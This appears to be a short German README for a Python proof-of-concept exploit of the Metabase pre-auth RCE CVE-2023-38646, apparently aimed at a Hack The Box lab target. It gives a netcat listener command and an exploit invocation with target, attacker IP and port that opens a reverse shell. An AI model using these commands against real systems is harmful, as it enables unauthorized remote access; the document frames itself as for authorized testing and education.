
Python-Exploit für Metabase Pre-Auth-RCE (CVE-2023-38646), der eine Reverse-Shell für autorisierte Sicherheitstests einrichtet.
⚠️ Nur für Bildungs- und autorisierte Sicherheitsforschungszwecke
Sehr dankbar dem ursprünglichen PoC-Autor securezeron
Richten Sie den Listener auf Ihrem Angreifer-Rechner ein:
nc -nlvp 4444
Führen Sie dann diesen Befehl aus:
python3 CVE-2023-38646-Reverse-Shell.py -h
python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
